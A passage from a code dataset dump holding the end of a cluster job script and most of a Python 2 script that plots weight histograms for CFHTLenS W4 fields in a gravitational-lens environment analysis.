/u/local/Modules/default/init/modules.sh\nmodule load python/2.7.13_shared\ncd /u/flashscratch/c/cerusu\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5 -1.0 -1.0\n\n# run as qsub -l h_data=6G,h_rt=336:00:00,highp -m abe -N test script.sh\n" }, { "alpha_fraction": 0.5598971247673035, "alphanum_fraction": 0.6552122831344604, "avg_line_length": 52.97972106933594, "blob_id": "846e479497a68985f003514257751dc97612400f", "content_id": "97ab5e5bd42b9eac1ae9987f0a2619af1cc8fcc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34601, "license_type": "no_license", "max_line_length": 315, "num_lines": 641, "path": "/python/weightinghistogramsuniversalW4.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s \\n Classification: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5]), str(sys.argv[6])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = 
np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=3\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,2,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(452)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % 
(x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=5\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(453)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(453)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=7\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(454)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, 
bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(454)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=9\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(456)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(456)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=11\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(457)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, 
bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(457)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^2_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=13\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(458)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(458)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=15\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = 
np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(459)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(459)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=17\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,11)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,11)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % 
(subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=19\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,12)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,12)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=21\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,13)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, 
